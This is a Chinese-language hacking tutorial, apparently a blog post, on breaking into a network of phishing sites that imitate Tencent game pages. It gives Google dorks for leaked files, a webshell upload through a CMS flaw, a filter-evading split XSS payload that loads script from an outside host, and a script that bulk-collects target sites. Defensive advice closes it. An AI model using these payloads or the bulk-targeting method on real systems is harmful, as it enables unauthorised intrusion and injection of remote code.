攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
字数 1349 2025-08-18 11:37:19

钓鱼网站渗透实战教学文档

一、信息搜集阶段

1. 初始发现

  • 钓鱼网站示例:http://mfnyongshihuigui.jiebao8.top
  • 主域名:jiebao8.top

2. Google语法信息搜集

使用以下Google语法搜索潜在漏洞:

  1. 目录遍历漏洞

    site:jiebao8.top intitle:index.of
    
  2. 配置文件泄露

    site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
    
  3. 数据库文件泄露

    site:jiebao8.top ext:sql | ext:dbf | ext:mdb
    
  4. 日志文件泄露

    site:jiebao8.top ext:log
    
  5. 备份和历史文件

    site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
    
  6. SQL错误

    site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
    
  7. 公开文件信息

    site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
    
  8. phpinfo()

    site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"
    

3. 威胁情报分析

使用微步在线分析域名:

https://x.threatbook.cn/domain/mfnyongshihuigui.jiebao8.top

发现:

  • IP地址:162.247.96.114
  • 该IP下共有230个域名(异常数量,可能用于恶意目的)

4. 端口扫描

发现开放端口:

  • 21 (FTP)
  • 80 (HTTP)
  • 102 (SSH)
  • 3306 (MySQL)

5. CMS识别

使用云悉CMS识别工具:

http://www.yunsee.cn/

识别结果为PCWAP CMS(小众CMS系统)

二、渗透阶段

1. 利用已知0day漏洞

  • 已知PCWAP CMS存在0day漏洞
  • 越权进入后台

2. 文件上传漏洞利用

  1. 修改文件上传类型,添加.php扩展名
  2. 上传图片LOGO时,由于修改了上传类型,可直接上传webshell
  3. 尝试上传:
    • 大马
    • 小马
    • 一句话木马

3. 提权尝试

  • 尝试执行Linux命令失败(可能被禁止)
  • 打包所有源码进行后续分析

三、XSS漏洞挖掘与利用

1. 初始XSS测试

  1. 提交账号密码时抓包
  2. 测试payload:
    u=12312312&p=12312"><c>1&bianhao=1
    
    • c标签成功执行,证明存在XSS漏洞

2. 过滤机制分析

通过模糊测试发现过滤机制:

  • 过滤字符:a字符、onmouseover、onload等常见事件
  • 最大输入长度:32个字符
  • 过滤特殊字符:+, &#等
  • 允许的事件:onscroll, onfocus
  • 允许的标签:body, input, br, i
  • Unicode编码未被过滤

3. 拆分跨站技术

由于限制严格,采用拆分跨站技术:

攻击原理

  1. 构造一个函数,当鼠标滚轮移动时让所有元素获取焦点
  2. 使用input标签启动onfocus函数
  3. 分别加载XSS站点

攻击代码

<body onscroll=$(`*`).focus()> 1
<i id="i">$.getScript(`//xs.tv`) 2
<input/onfocus=s=$("i").text()> 3
<input/onfocus=ev\u0061l(s)> 4
<br><br><br><br><br><br><br><br> 5

代码解释

  1. 当移动鼠标滑轮时触发$(*).focus(),使所有元素获得焦点
  2. i标签中包含要执行的JS代码(使用jQuery的getScript方法)
  3. 第一个input获取焦点时,获取i标签中的内容
  4. 第二个input获取焦点时,执行获取的JS代码
  5. 多个br标签确保页面足够长,便于触发滚动事件

四、批量攻击钓鱼网站

1. 钓鱼网站识别

通过关键词搜索识别钓鱼网站:

  • "幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏"
  • "老兵空降回归-绝地求生官方网站-腾讯游戏"

2. 批量采集脚本

import requests
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Connection': 'keep-alive',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'X-Forwarded-For':'120.239.169.74'
}

proxies = {
    "http":"http://127.0.0.1:8080",
    "https":"https://127.0.0.1:8080",
}

for i in range(0,200,10):
    bd_search = "https://www.baidu.com/s?wd=幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏&pn=%s" % str(i)
    r = requests.get(bd_search, headers=headers, verify=False, proxies=proxies, timeout=2)
    
    with open("1.html", "a+", encoding="utf-8") as f:
        f.write(r.text)
    
    soup = BeautifulSoup(r.text, "lxml")
    url_list = soup.select(".t > a")
    
    for url in url_list:
        real_url = url['href']
        try:
            r = requests.get(real_url, headers=headers, verify=False, proxies=proxies, timeout=2)
            print(r.url)
            with open("exp.txt", "a+", encoding="utf-8") as f:
                f.write(r.url+"\n")
        except Exception as e:
            print(e)

3. 批量渗透

  • 编写专用脚本批量渗透钓鱼网站
  • 发现部分钓鱼网站每天可获取上百个账号密码

五、防御建议

1. 对网站管理员

  1. 及时更新CMS系统,修补已知漏洞
  2. 严格限制文件上传类型
  3. 实施输入过滤和输出编码
  4. 限制单个IP的域名数量
  5. 监控异常登录行为

2. 对普通用户

  1. 警惕非官方域名的"官方网站"
  2. 不要在不同网站使用相同密码
  3. 开启二次验证
  4. 定期检查账号异常活动

六、总结

本案例展示了从信息搜集到实际渗透钓鱼网站的完整过程,重点介绍了在严格过滤条件下的XSS绕过技术。通过批量识别和渗透钓鱼网站,可以有效减少网络诈骗的发生。

钓鱼网站渗透实战教学文档 一、信息搜集阶段 1. 初始发现 钓鱼网站示例:http://mfnyongshihuigui.jiebao8.top 主域名:jiebao8.top 2. Google语法信息搜集 使用以下Google语法搜索潜在漏洞: 目录遍历漏洞 配置文件泄露 数据库文件泄露 日志文件泄露 备份和历史文件 SQL错误 公开文件信息 phpinfo() 3. 威胁情报分析 使用微步在线分析域名: 发现: IP地址:162.247.96.114 该IP下共有230个域名(异常数量,可能用于恶意目的) 4. 端口扫描 发现开放端口: 21 (FTP) 80 (HTTP) 102 (SSH) 3306 (MySQL) 5. CMS识别 使用云悉CMS识别工具: 识别结果为PCWAP CMS(小众CMS系统) 二、渗透阶段 1. 利用已知0day漏洞 已知PCWAP CMS存在0day漏洞 越权进入后台 2. 文件上传漏洞利用 修改文件上传类型,添加.php扩展名 上传图片LOGO时,由于修改了上传类型,可直接上传webshell 尝试上传: 大马 小马 一句话木马 3. 提权尝试 尝试执行Linux命令失败(可能被禁止) 打包所有源码进行后续分析 三、XSS漏洞挖掘与利用 1. 初始XSS测试 提交账号密码时抓包 测试payload: c标签成功执行,证明存在XSS漏洞 2. 过滤机制分析 通过模糊测试发现过滤机制: 过滤字符:a字符、onmouseover、onload等常见事件 最大输入长度:32个字符 过滤特殊字符:+, &#等 允许的事件:onscroll, onfocus 允许的标签:body, input, br, i Unicode编码未被过滤 3. 拆分跨站技术 由于限制严格,采用拆分跨站技术: 攻击原理 : 构造一个函数,当鼠标滚轮移动时让所有元素获取焦点 使用input标签启动onfocus函数 分别加载XSS站点 攻击代码 : 代码解释 : 当移动鼠标滑轮时触发 $( * ).focus() ,使所有元素获得焦点 i标签中包含要执行的JS代码(使用jQuery的getScript方法) 第一个input获取焦点时,获取i标签中的内容 第二个input获取焦点时,执行获取的JS代码 多个br标签确保页面足够长,便于触发滚动事件 四、批量攻击钓鱼网站 1. 钓鱼网站识别 通过关键词搜索识别钓鱼网站: "幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏" "老兵空降回归-绝地求生官方网站-腾讯游戏" 2. 批量采集脚本 3. 批量渗透 编写专用脚本批量渗透钓鱼网站 发现部分钓鱼网站每天可获取上百个账号密码 五、防御建议 1. 对网站管理员 及时更新CMS系统,修补已知漏洞 严格限制文件上传类型 实施输入过滤和输出编码 限制单个IP的域名数量 监控异常登录行为 2. 对普通用户 警惕非官方域名的"官方网站" 不要在不同网站使用相同密码 开启二次验证 定期检查账号异常活动 六、总结 本案例展示了从信息搜集到实际渗透钓鱼网站的完整过程,重点介绍了在严格过滤条件下的XSS绕过技术。通过批量识别和渗透钓鱼网站,可以有效减少网络诈骗的发生。